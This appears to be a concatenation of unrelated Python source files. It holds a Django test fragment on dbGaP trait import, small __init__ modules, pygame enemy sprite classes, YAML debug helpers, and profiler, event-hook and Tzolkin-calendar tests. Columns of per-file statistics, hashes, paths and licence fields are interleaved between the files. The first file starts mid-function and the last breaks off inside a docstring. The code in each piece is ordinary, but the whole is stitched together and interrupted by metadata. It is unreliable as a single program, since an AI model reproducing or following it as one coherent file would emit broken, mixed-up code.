    # Load test data with updated study version.
    load_test_source_db_data('new_study_version.sql')
    # Remove a trait from the devel db via SQL query, so that trait exists in v1 only.
    source_db = get_devel_db(permissions='full')
    cursor = source_db.cursor(buffered=True)
    new_trait_v1_only_conditions = (
        'study_accession={}'.format(study_phs),
        'study_version=2',
        'dbgap_trait_accession={}'.format(old_trait_v1_only.i_dbgap_variable_accession)
    )
    new_trait_v1_only_query = 'SELECT source_trait_id FROM view_source_trait_all WHERE ' + ' AND '.join(
        new_trait_v1_only_conditions
    )
    cursor.execute(new_trait_v1_only_query)
    new_trait_v1_only_source_trait_id = cursor.fetchall()[0][0]
    delete_query = 'DELETE FROM source_trait WHERE source_trait_id={}'.format(new_trait_v1_only_source_trait_id)
    cursor.execute(delete_query)
    source_db.commit()
    cursor.close()
    source_db.close()
    # Run import of updated study version
    management.call_command('import_db', '--devel_db', '--no_backup',
                            '--taggedtrait_creator={}'.format(self.user.email))
    ssv2 = models.SourceStudyVersion.objects.get(study__pk=956, i_version=2)
    # There are no new taggedtraits: the undecided taggedtrait blocks tag application.
    later_taggedtraits_count = TaggedTrait.objects.count()
    self.assertEqual(old_taggedtraits_count, later_taggedtraits_count)
    ssv1_taggedtraits = TaggedTrait.objects.filter(trait__source_dataset__source_study_version=ssv1).all()
    self.assertEqual(ssv1_taggedtraits.count(), 3)
    ssv2_taggedtraits = TaggedTrait.objects.filter(trait__source_dataset__source_study_version=ssv2).all()
    self.assertEqual(ssv2_taggedtraits.count(), 0)
| 55.2837
| 154
| 0.677919
| 28,104
| 223,512
| 5.076502
| 0.028644
| 0.025177
| 0.022457
| 0.021574
| 0.85758
| 0.826369
| 0.798689
| 0.781713
| 0.769468
| 0.757615
| 0
| 0.008617
| 0.22376
| 223,512
| 4,042
| 155
| 55.297378
| 0.813693
| 0.168362
| 0
| 0.732847
| 0
| 0.000331
| 0.122504
| 0.041252
| 0.001326
| 0
| 0
| 0.000247
| 0.09115
| 1
| 0.053696
| false
| 0.000663
| 0.053033
| 0
| 0.115015
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
71107c9dd33dfd5408c87690cd80285a19ddd011
| 101
|
py
|
Python
|
datasets/__init__.py
|
bigvideoresearch/SCC
|
f26cdb6aaf248b5112812dbdac1f1b5086aebccc
|
[
"MIT"
] | 5
|
2021-09-15T21:48:55.000Z
|
2022-03-22T11:21:58.000Z
|
datasets/__init__.py
|
bigvideoresearch/SCC
|
f26cdb6aaf248b5112812dbdac1f1b5086aebccc
|
[
"MIT"
] | null | null | null |
datasets/__init__.py
|
bigvideoresearch/SCC
|
f26cdb6aaf248b5112812dbdac1f1b5086aebccc
|
[
"MIT"
] | 1
|
2021-08-20T08:40:15.000Z
|
2021-08-20T08:40:15.000Z
|
from .imagename_dataset import *
from .online_labeler_dataset import *
from .pseudo_dataset import *
| 25.25
| 37
| 0.821782
| 13
| 101
| 6.076923
| 0.538462
| 0.493671
| 0.43038
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.118812
| 101
| 3
| 38
| 33.666667
| 0.88764
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
7117f93b498f378ecee7b37deabe0485e5cfbf46
| 4,643
|
py
|
Python
|
yaojikai/mypant/enemy.py
|
python20180319howmework/homework
|
c826d7aa4c52f8d22f739feb134d20f0b2c217cd
|
[
"Apache-2.0"
] | null | null | null |
yaojikai/mypant/enemy.py
|
python20180319howmework/homework
|
c826d7aa4c52f8d22f739feb134d20f0b2c217cd
|
[
"Apache-2.0"
] | null | null | null |
yaojikai/mypant/enemy.py
|
python20180319howmework/homework
|
c826d7aa4c52f8d22f739feb134d20f0b2c217cd
|
[
"Apache-2.0"
] | null | null | null |
import pygame
from random import *
class SmallEnemy(pygame.sprite.Sprite):
    """Small enemy plane: fastest mover, destroyed by a single hit."""

    def __init__(self, screen):
        super().__init__()
        # Main frame plus the four-frame destruction animation.
        self.image = pygame.image.load("./images/enemy1.png").convert_alpha()
        self.destroy_images = [
            pygame.image.load("./images/enemy1_down1.png").convert_alpha(),
            pygame.image.load("./images/enemy1_down2.png").convert_alpha(),
            pygame.image.load("./images/enemy1_down3.png").convert_alpha(),
            pygame.image.load("./images/enemy1_down4.png").convert_alpha(),
        ]
        self.rect = self.image.get_rect()
        # Playfield size; NOTE(review): the `screen` argument is not used.
        self.width, self.height = 480, 700
        self.speed = 2
        self.active = True
        # Spawn at a random x, somewhere above the visible area.
        self.rect.left = randint(0, self.width - self.rect.width)
        self.rect.top = randint(-5 * self.height, 0)
        self.mask = pygame.mask.from_surface(self.image)

    def move(self):
        """Advance downward; respawn once past the bottom of the playfield."""
        if self.rect.top >= self.height:
            self.reset()
        else:
            self.rect.top += self.speed

    def reset(self):
        """Reactivate at a fresh random position above the visible area."""
        self.active = True
        self.rect.left = randint(0, self.width - self.rect.width)
        self.rect.top = randint(-5 * self.height, 0)
class MidEnemy(pygame.sprite.Sprite):
    """Medium enemy plane: slower than SmallEnemy and absorbs several hits."""

    # Class-level default hit points; copied to each instance on spawn/reset.
    energy = 8

    def __init__(self, screen):
        super().__init__()
        # Normal frame, hit-flash frame, and four-frame destruction animation.
        self.image = pygame.image.load("./images/enemy2.png").convert_alpha()
        self.image_hit = pygame.image.load("./images/enemy2_hit.png").convert_alpha()
        self.destroy_images = [
            pygame.image.load("./images/enemy2_down1.png").convert_alpha(),
            pygame.image.load("./images/enemy2_down2.png").convert_alpha(),
            pygame.image.load("./images/enemy2_down3.png").convert_alpha(),
            pygame.image.load("./images/enemy2_down4.png").convert_alpha(),
        ]
        self.rect = self.image.get_rect()
        # Playfield size; NOTE(review): the `screen` argument is not used.
        self.width, self.height = 480, 700
        self.speed = 1
        self.active = True
        # Spawn at a random x, staged well above the visible area.
        self.rect.left = randint(0, self.width - self.rect.width)
        self.rect.top = randint(-10 * self.height, -self.height)
        self.mask = pygame.mask.from_surface(self.image)
        self.energy = MidEnemy.energy
        self.hit = False

    def move(self):
        """Advance downward; respawn once past the bottom of the playfield."""
        if self.rect.top >= self.height:
            self.reset()
        else:
            self.rect.top += self.speed

    def reset(self):
        """Reactivate with full energy at a fresh off-screen position."""
        self.active = True
        self.energy = MidEnemy.energy
        self.rect.left = randint(0, self.width - self.rect.width)
        self.rect.top = randint(-10 * self.height, -self.height)
class BigEnemy(pygame.sprite.Sprite):
    """Big enemy plane: toughest, with two normal frames and a six-frame crash."""

    # Class-level default hit points; copied to each instance on spawn/reset.
    energy = 20

    def __init__(self, screen):
        super().__init__()
        # Two alternating normal frames, a hit-flash frame, and the crash frames.
        self.image1 = pygame.image.load("./images/enemy3_n1.png").convert_alpha()
        self.image2 = pygame.image.load("./images/enemy3_n2.png").convert_alpha()
        self.image_hit = pygame.image.load("./images/enemy3_hit.png").convert_alpha()
        self.destroy_images = [
            pygame.image.load("./images/enemy3_down1.png").convert_alpha(),
            pygame.image.load("./images/enemy3_down2.png").convert_alpha(),
            pygame.image.load("./images/enemy3_down3.png").convert_alpha(),
            pygame.image.load("./images/enemy3_down4.png").convert_alpha(),
            pygame.image.load("./images/enemy3_down5.png").convert_alpha(),
            pygame.image.load("./images/enemy3_down6.png").convert_alpha(),
        ]
        # Rect and collision mask are both derived from the first normal frame.
        self.rect = self.image1.get_rect()
        # Playfield size; NOTE(review): the `screen` argument is not used.
        self.width, self.height = 480, 700
        self.speed = 1
        self.active = True
        # Spawn at a random x, staged far above the visible area.
        self.rect.left = randint(0, self.width - self.rect.width)
        self.rect.top = randint(-15 * self.height, -5 * self.height)
        self.mask = pygame.mask.from_surface(self.image1)
        self.energy = BigEnemy.energy
        self.hit = False

    def move(self):
        """Advance downward; respawn once past the bottom of the playfield."""
        if self.rect.top >= self.height:
            self.reset()
        else:
            self.rect.top += self.speed

    def reset(self):
        """Reactivate with full energy at a fresh off-screen position."""
        self.active = True
        self.energy = BigEnemy.energy
        self.rect.left = randint(0, self.width - self.rect.width)
        self.rect.top = randint(-15 * self.height, -5 * self.height)
| 37.747967
| 85
| 0.571398
| 547
| 4,643
| 4.711152
| 0.115174
| 0.083818
| 0.116414
| 0.16298
| 0.922002
| 0.864571
| 0.854094
| 0.854094
| 0.640667
| 0.615056
| 0
| 0.025316
| 0.285376
| 4,643
| 122
| 86
| 38.057377
| 0.751356
| 0
| 0
| 0.705882
| 0
| 0
| 0.103039
| 0.094848
| 0
| 0
| 0
| 0
| 0
| 1
| 0.088235
| false
| 0
| 0.019608
| 0
| 0.156863
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
713a5c5920a183561878da2a9dd5b20faae575fc
| 94
|
py
|
Python
|
contrib/EzTemplate/Lib/__init__.py
|
xylar/cdat
|
8a5080cb18febfde365efc96147e25f51494a2bf
|
[
"BSD-3-Clause"
] | 62
|
2018-03-30T15:46:56.000Z
|
2021-12-08T23:30:24.000Z
|
contrib/EzTemplate/Lib/__init__.py
|
xylar/cdat
|
8a5080cb18febfde365efc96147e25f51494a2bf
|
[
"BSD-3-Clause"
] | 114
|
2018-03-21T01:12:43.000Z
|
2021-07-05T12:29:54.000Z
|
contrib/EzTemplate/Lib/__init__.py
|
CDAT/uvcdat
|
5133560c0c049b5c93ee321ba0af494253b44f91
|
[
"BSD-3-Clause"
] | 14
|
2018-06-06T02:42:47.000Z
|
2021-11-26T03:27:00.000Z
|
import vcsaddons
from vcsaddons.EzTemplate import Multi
from vcsaddons.EzTemplate import oneD
| 23.5
| 38
| 0.87234
| 12
| 94
| 6.833333
| 0.5
| 0.317073
| 0.560976
| 0.707317
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.106383
| 94
| 3
| 39
| 31.333333
| 0.97619
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
713abef86742a93710bac0615051c03ee515948d
| 263
|
py
|
Python
|
lib/yamlfuture/xxx.py
|
yaml/pyyaml-future
|
289983cbe8ffc49540fe2c02b2f118a46629146b
|
[
"MIT"
] | 1
|
2021-07-06T03:29:11.000Z
|
2021-07-06T03:29:11.000Z
|
lib/yamlfuture/xxx.py
|
yaml/pyyaml-future
|
289983cbe8ffc49540fe2c02b2f118a46629146b
|
[
"MIT"
] | null | null | null |
lib/yamlfuture/xxx.py
|
yaml/pyyaml-future
|
289983cbe8ffc49540fe2c02b2f118a46629146b
|
[
"MIT"
] | null | null | null |
def _dump_yaml(o):
    """Print *o* as an explicit YAML document (shared debug helper).

    Keeps the import local so the module works without PyYAML until one of
    the debug helpers is actually called.
    """
    import yaml
    print(yaml.dump(o, explicit_start=True, explicit_end=True, sort_keys=False))


def YYY(o):
    """Dump *o* as YAML and return it unchanged (tap-style debug helper)."""
    _dump_yaml(o)
    return o


def XXX(o):
    """Dump *o* as YAML, then abort the process with exit status 1."""
    _dump_yaml(o)
    import sys
    sys.exit(1)
| 23.909091
| 80
| 0.692015
| 43
| 263
| 4.093023
| 0.44186
| 0.079545
| 0.125
| 0.181818
| 0.795455
| 0.795455
| 0.795455
| 0.795455
| 0.795455
| 0.795455
| 0
| 0.004695
| 0.190114
| 263
| 10
| 81
| 26.3
| 0.821596
| 0
| 0
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.222222
| false
| 0
| 0.333333
| 0
| 0.666667
| 0.222222
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
a47afe6fa23b216f1b075eec5abffcc93b31f12e
| 217
|
py
|
Python
|
output/models/ms_data/identity_constraint/id_f029_xsd/__init__.py
|
tefra/xsdata-w3c-tests
|
b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f
|
[
"MIT"
] | 1
|
2021-08-14T17:59:21.000Z
|
2021-08-14T17:59:21.000Z
|
output/models/ms_data/identity_constraint/id_f029_xsd/__init__.py
|
tefra/xsdata-w3c-tests
|
b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f
|
[
"MIT"
] | 4
|
2020-02-12T21:30:44.000Z
|
2020-04-15T20:06:46.000Z
|
output/models/ms_data/identity_constraint/id_f029_xsd/__init__.py
|
tefra/xsdata-w3c-tests
|
b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f
|
[
"MIT"
] | null | null | null |
from output.models.ms_data.identity_constraint.id_f029_xsd.id_f029 import (
Root,
T,
)
from output.models.ms_data.identity_constraint.id_f029_xsd.id_f029a import R
__all__ = [
"Root",
"T",
"R",
]
| 18.083333
| 76
| 0.700461
| 33
| 217
| 4.181818
| 0.484848
| 0.130435
| 0.231884
| 0.26087
| 0.73913
| 0.73913
| 0.73913
| 0.73913
| 0.73913
| 0.73913
| 0
| 0.067416
| 0.179724
| 217
| 11
| 77
| 19.727273
| 0.707865
| 0
| 0
| 0
| 0
| 0
| 0.02765
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.2
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a4a684080fa89a37c94e50538abe492660a03f8b
| 3,312
|
py
|
Python
|
tests/test_profiler.py
|
lizeyan/pyprof
|
d33168594ffabc628636858ae3873d092b2ba9e7
|
[
"MIT"
] | 6
|
2021-07-11T16:01:01.000Z
|
2022-02-10T05:59:30.000Z
|
tests/test_profiler.py
|
lizeyan/pyprof
|
d33168594ffabc628636858ae3873d092b2ba9e7
|
[
"MIT"
] | null | null | null |
tests/test_profiler.py
|
lizeyan/pyprof
|
d33168594ffabc628636858ae3873d092b2ba9e7
|
[
"MIT"
] | null | null | null |
import random
# noinspection PyProtectedMember
import time
import numpy as np
from concurrent.futures import ThreadPoolExecutor
from pyprof import clean, Profiler, report
from .test_utils import close
def test_snippet_context_manager():
    """Exercise profiler-tree construction and the three single-thread timing styles."""
    clean()
    # noinspection PyProtectedMember
    from pyprof.pyprof import _root_profiler
    assert _root_profiler.full_path == ""
    p1 = Profiler("p1")
    p2 = Profiler("p2")
    p3 = Profiler("p3", p2)
    p4 = Profiler("p4", p3)
    # Untouched profilers report zero statistics.
    assert p1.average == 0
    assert p2.tail(10) == 0
    # Full paths reflect the parent chain.
    assert Profiler("p1").full_path == "/p1"
    assert p2.full_path == "/p2"
    assert Profiler("p3", p2).full_path == "/p2/p3"
    assert Profiler("p4", p3).full_path == "/p2/p3/p4"
    assert set(p1._children) == set()
    assert set(p2._children) == {p3}
    assert set(p3._children) == {p4}
    assert p4 == Profiler("p4", p3)
    # Identity, not just equality: one profiler object per (name, parent).
    assert p4 is Profiler("p4", p3)
    times = np.abs(np.random.normal(0.1, 0.01, 10))
    with p3:
        for t in times:
            # Randomly pick one of the three usage styles -- tic/toc,
            # context manager, or callable wrapper -- all must record the sleep.
            _ = random.random()
            if _ <= 0.3:
                p4.tic()
                time.sleep(t)
                p4.toc()
            elif _ <= 0.5:
                with p4:
                    time.sleep(t)
            else:
                p4(lambda: time.sleep(t))()
    assert p4.count == len(times)
    assert close(p4.average, np.mean(times).item())
    assert close(p4.standard_deviation, np.std(times).item())
    assert close(p4.max_time, np.max(times).item())
    assert close(p4.tail(50), np.percentile(times, 50).item())
    assert close(p4.tail(90), np.percentile(times, 90).item())
    # Serial execution: the parent's total covers all child sleeps plus overhead.
    assert p3.total > np.sum(times)
    assert p2._max_children_full_path_length() == 9
    rpt = report()
    print()
    print(rpt)
    # Report layout: a header line plus one line per profiler node (5 nodes).
    assert len(rpt.splitlines()) == 5 + 1
    assert str(_root_profiler) == '\n'.join(rpt.splitlines()[1:]) + '\n'
def test_multi_thread_profiler():
    """Same tree checks as the single-thread test, but timing from a thread pool."""
    clean()
    # noinspection PyProtectedMember
    from pyprof.pyprof import _root_profiler
    assert _root_profiler.full_path == ""
    p1 = Profiler("p1")
    p2 = Profiler("p2")
    p3 = Profiler("p3", p2)
    p4 = Profiler("p4", p3)
    # Untouched profilers report zero statistics.
    assert p1.average == 0
    assert p2.tail(10) == 0
    # Full paths reflect the parent chain.
    assert Profiler("p1").full_path == "/p1"
    assert p2.full_path == "/p2"
    assert Profiler("p3", p2).full_path == "/p2/p3"
    assert Profiler("p4", p3).full_path == "/p2/p3/p4"
    assert set(p1._children) == set()
    assert set(p2._children) == {p3}
    assert set(p3._children) == {p4}
    assert p4 == Profiler("p4", p3)
    # Identity, not just equality: one profiler object per (name, parent).
    assert p4 is Profiler("p4", p3)
    times = np.abs(np.random.normal(0.1, 0.01, 10))
    with p3:
        # Run all sleeps concurrently through the wrapped callable.
        with ThreadPoolExecutor(max_workers=8) as pool:
            pool.map(p4(lambda t: time.sleep(t)), times)
    assert p4.count == len(times)
    assert close(p4.average, np.mean(times).item())
    assert close(p4.standard_deviation, np.std(times).item())
    assert close(p4.max_time, np.max(times).item())
    assert close(p4.tail(50), np.percentile(times, 50).item())
    assert close(p4.tail(90), np.percentile(times, 90).item())
    # Concurrent execution: sleeps overlap, so the parent's wall-clock total
    # is below the summed sleep durations (note `<` vs `>` in the serial test).
    assert p3.total < np.sum(times)
    assert p2._max_children_full_path_length() == 9
    rpt = report()
    print()
    print(rpt)
    # Report layout: a header line plus one line per profiler node (5 nodes).
    assert len(rpt.splitlines()) == 5 + 1
    assert str(_root_profiler) == '\n'.join(rpt.splitlines()[1:]) + '\n'
| 32.470588
| 72
| 0.608092
| 462
| 3,312
| 4.244589
| 0.179654
| 0.048955
| 0.066293
| 0.069352
| 0.803672
| 0.803672
| 0.803672
| 0.803672
| 0.803672
| 0.803672
| 0
| 0.057526
| 0.233696
| 3,312
| 101
| 73
| 32.792079
| 0.71513
| 0.027778
| 0
| 0.758621
| 0
| 0
| 0.026741
| 0
| 0
| 0
| 0
| 0
| 0.505747
| 1
| 0.022989
| false
| 0
| 0.091954
| 0
| 0.114943
| 0.045977
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f105a4fdcb647f0f074bd85c14d8f39fa5c80b60
| 2,807
|
py
|
Python
|
tests/event/beforeafter/test_beforeafter.py
|
da-h/miniflask
|
d5e594153cca4ce4d30db01b1d06d05afa9e7aaa
|
[
"MIT"
] | 5
|
2020-02-17T12:14:36.000Z
|
2020-02-27T12:09:05.000Z
|
tests/event/beforeafter/test_beforeafter.py
|
da-h/miniflask
|
d5e594153cca4ce4d30db01b1d06d05afa9e7aaa
|
[
"MIT"
] | 69
|
2020-04-03T08:16:35.000Z
|
2021-12-21T15:46:29.000Z
|
tests/event/beforeafter/test_beforeafter.py
|
da-h/miniflask
|
d5e594153cca4ce4d30db01b1d06d05afa9e7aaa
|
[
"MIT"
] | 1
|
2020-04-02T15:46:39.000Z
|
2020-04-02T15:46:39.000Z
|
from pathlib import Path
import miniflask # noqa: E402
def test_beforeafter_setup(capsys):
    """Baseline: only the 'setup' module loaded, so the event runs with its default value."""
    mf = miniflask.init(
        module_dirs=str(Path(__file__).parent / "modules"),
        debug=True
    )
    mf.load("setup")
    mf.parse_args([])
    captured = capsys.readouterr()  # discard load/parse output before the real capture
    mf.event.main()
    captured = capsys.readouterr()
    assert captured.out == """
event called with value: 42
event returned value: 42
""".lstrip()
def test_beforeafter_before(capsys):
    """Two before-hooks run ahead of the event, in module load order."""
    mf = miniflask.init(
        module_dirs=str(Path(__file__).parent / "modules"),
        debug=True
    )
    mf.load(["setup", "beforeevent", "beforeevent2"])
    mf.parse_args([])
    captured = capsys.readouterr()  # discard load/parse output before the real capture
    mf.event.main()
    captured = capsys.readouterr()
    assert captured.out == """
before_-event called
before_-event (2) called
event called with value: 85
event returned value: 85
""".lstrip()
def test_beforeafter_before_otherorder(capsys):
    """Swapped load order swaps the before-hook order (and the resulting value)."""
    mf = miniflask.init(
        module_dirs=str(Path(__file__).parent / "modules"),
        debug=True
    )
    mf.load(["setup", "beforeevent2", "beforeevent"])
    mf.parse_args([])
    captured = capsys.readouterr()  # discard load/parse output before the real capture
    mf.event.main()
    captured = capsys.readouterr()
    assert captured.out == """
before_-event (2) called
before_-event called
event called with value: 86
event returned value: 86
""".lstrip()
def test_beforeafter_after(capsys):
    """Two after-hooks run following the event and modify its return value."""
    mf = miniflask.init(
        module_dirs=str(Path(__file__).parent / "modules"),
        debug=True
    )
    mf.load(["setup", "afterevent", "afterevent2"])
    mf.parse_args([])
    captured = capsys.readouterr()  # discard load/parse output before the real capture
    mf.event.main()
    captured = capsys.readouterr()
    assert captured.out == """
event called with value: 42
after_-event called
after_-event (2) called
event returned value: 85
""".lstrip()
def test_beforeafter_after_otherorder(capsys):
    """Swapped load order swaps the after-hook order (and the returned value)."""
    mf = miniflask.init(
        module_dirs=str(Path(__file__).parent / "modules"),
        debug=True
    )
    mf.load(["setup", "afterevent2", "afterevent"])
    mf.parse_args([])
    captured = capsys.readouterr()  # discard load/parse output before the real capture
    mf.event.main()
    captured = capsys.readouterr()
    assert captured.out == """
event called with value: 42
after_-event (2) called
after_-event called
event returned value: 86
""".lstrip()
def test_beforeafter_all(capsys):
    """Before- and after-hooks combined: both pairs fire around the event."""
    mf = miniflask.init(
        module_dirs=str(Path(__file__).parent / "modules"),
        debug=True
    )
    mf.load(["setup", "beforeevent", "beforeevent2", "afterevent", "afterevent2"])
    mf.parse_args([])
    captured = capsys.readouterr()  # discard load/parse output before the real capture
    mf.event.main()
    captured = capsys.readouterr()
    assert captured.out == """
before_-event called
before_-event (2) called
event called with value: 85
after_-event called
after_-event (2) called
event returned value: 171
""".lstrip()
| 25.288288
| 82
| 0.662985
| 334
| 2,807
| 5.386228
| 0.146707
| 0.093385
| 0.160089
| 0.070039
| 0.896609
| 0.856587
| 0.856587
| 0.856587
| 0.76876
| 0.76876
| 0
| 0.017723
| 0.195939
| 2,807
| 110
| 83
| 25.518182
| 0.779353
| 0.003563
| 0
| 0.765306
| 0
| 0
| 0.285868
| 0
| 0
| 0
| 0
| 0
| 0.061224
| 1
| 0.061224
| false
| 0
| 0.020408
| 0
| 0.081633
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f14cfdb772b4b909013a0dc01b721fafbd2e6547
| 40,919
|
py
|
Python
|
tests/test_tzolkin.py
|
Release-Candidate/tzolkin-calendar
|
6dc9722381adda22750988b09905d1da88fc1ed5
|
[
"MIT"
] | null | null | null |
tests/test_tzolkin.py
|
Release-Candidate/tzolkin-calendar
|
6dc9722381adda22750988b09905d1da88fc1ed5
|
[
"MIT"
] | 2
|
2021-03-23T21:59:05.000Z
|
2021-03-25T17:22:31.000Z
|
tests/test_tzolkin.py
|
Release-Candidate/tzolkin-calendar
|
6dc9722381adda22750988b09905d1da88fc1ed5
|
[
"MIT"
] | null | null | null |
# SPDX-License-Identifier: MIT
# Copyright (C) 2021 Roland Csaszar
#
# Project: tzolkin-calendar
# File: test_tzolkin.py
# Date: 21.Mar.2021
###############################################################################
"""Test tzolkin module."""
from __future__ import annotations
import datetime
import pytest
from hypothesis import given, settings
from hypothesis import strategies as st
from tzolkin_calendar import USED_DATEFMT, TzolkinDate, TzolkinException, day_names
from tzolkin_calendar.calculate import (
getTzolkinDay,
getTzolkinDiff,
lastTzolkin,
makeLookUpTable,
nextTzolkin,
tzolkin2gregorian,
)
from tzolkin_calendar.tzolkin import Tzolkin
# Using https://maya.nmai.si.edu/calendar/maya-calendar-converter
# Reference table: Gregorian date string (DD.MM.YYYY, see USED_DATEFMT) mapped
# to the Tzolkin date expected from the converter linked above.
local_reference_dates = {
    "01.01.1800": TzolkinDate(number=10, name=14),
    "12.12.1926": TzolkinDate(number=4, name=19),
    "26.01.1958": TzolkinDate(number=10, name=7),
    "15.03.1967": TzolkinDate(number=4, name=2),
    "01.01.1970": TzolkinDate(number=13, name=5),
    "08.05.1975": TzolkinDate(number=3, name=18),
    "17.02.1978": TzolkinDate(number=5, name=14),
    "25.10.1986": TzolkinDate(number=5, name=6),
    "13.05.1992": TzolkinDate(number=4, name=13),
    "08.11.1997": TzolkinDate(number=7, name=18),
    "01.01.2000": TzolkinDate(number=11, name=2),
    "06.07.2005": TzolkinDate(number=9, name=15),
    "01.10.2017": TzolkinDate(number=7, name=5),
    "20.03.2021": TzolkinDate(number=12, name=11),
}
################################################################################
def test_TzolkinException1() -> None:
    """Test the constructor of `Tzolkin`, using an invalid day number."""
    # 17 is outside the valid Tzolkin day-number range, so construction must fail.
    with pytest.raises(TzolkinException) as excp:
        Tzolkin(number=17, name_number=7)
    assert excp  # nosec
################################################################################
def test_TzolkinException2() -> None:
    """Test the constructor of `Tzolkin`, using an invalid day name number."""
    # 27 is outside the valid day-name-number range, so construction must fail.
    with pytest.raises(TzolkinException) as excp:
        Tzolkin(number=6, name_number=27)
    assert excp  # nosec
################################################################################
def test_TzolkinException3() -> None:
    """Test the constructor of `Tzolkin`, using an invalid day name."""
    # A name string not present in the known day names must be rejected.
    with pytest.raises(TzolkinException) as excp:
        Tzolkin(number=6, name_str="DOES NOT EXIST")
    assert excp  # nosec
################################################################################
@pytest.mark.parametrize(
    "gregorian,tzolkin",
    [
        # Generate one case per reference date instead of 14 hand-copied
        # pytest.param entries; ids and ordering match the dict exactly.
        pytest.param(date_str, tzolkin_date, id=date_str)
        for date_str, tzolkin_date in local_reference_dates.items()
    ],
)
def test_fromDate(gregorian: str, tzolkin: TzolkinDate) -> None:
    """Test `Tzolkin.fromDate` against the hand-checked reference dates.

    Args:
        gregorian: Gregorian date string in `USED_DATEFMT` (DD.MM.YYYY).
        tzolkin: The Tzolkin date expected for that Gregorian date.
    """
    gregorian_date = datetime.datetime.strptime(gregorian, USED_DATEFMT).date()
    to_test = Tzolkin.fromDate(gregorian_date)
    assert to_test.getDayNumber() == tzolkin.number  # nosec
    assert to_test.getDayNameNumber() == tzolkin.name  # nosec
################################################################################
@pytest.mark.parametrize(
    "gregorian,tzolkin",
    [
        # One test case per reference date; the date string doubles as the ID.
        pytest.param(date, local_reference_dates[date], id=date)
        for date in (
            "01.01.1800", "12.12.1926", "26.01.1958", "15.03.1967",
            "01.01.1970", "08.05.1975", "17.02.1978", "25.10.1986",
            "13.05.1992", "08.11.1997", "01.01.2000", "06.07.2005",
            "01.10.2017", "20.03.2021",
        )
    ],
)
def test_fromDateConst(gregorian: str, tzolkin: TzolkinDate) -> None:
    """Test that the `Tzolkin` constructor agrees with `Tzolkin.fromDate`.

    Args:
        gregorian: Gregorian date string, formatted as `USED_DATEFMT`.
        tzolkin: Expected Tzolkin date for that Gregorian date.
    """
    gregorian_date = datetime.datetime.strptime(gregorian, USED_DATEFMT).date()
    to_test = Tzolkin.fromDate(gregorian_date)
    # Build the same Tzolkin date via the constructor, using the day name
    # string looked up from the expected day-name number.
    another = Tzolkin(number=tzolkin.number, name_str=day_names[tzolkin.name])
    assert to_test.getDayNumber() == another.getDayNumber()  # nosec
    assert to_test.getDayNameNumber() == another.getDayNameNumber()  # nosec
@pytest.mark.parametrize(
    "gregorian,tzolkin",
    [
        # One test case per reference date; the date string doubles as the ID.
        pytest.param(date, local_reference_dates[date], id=date)
        for date in (
            "01.01.1800", "12.12.1926", "26.01.1958", "15.03.1967",
            "01.01.1970", "08.05.1975", "17.02.1978", "25.10.1986",
            "13.05.1992", "08.11.1997", "01.01.2000", "06.07.2005",
            "01.10.2017", "20.03.2021",
        )
    ],
)
def test_fromDateStr(gregorian: str, tzolkin: TzolkinDate) -> None:
    """Test `Tzolkin.fromDateString` against the local reference dates.

    Args:
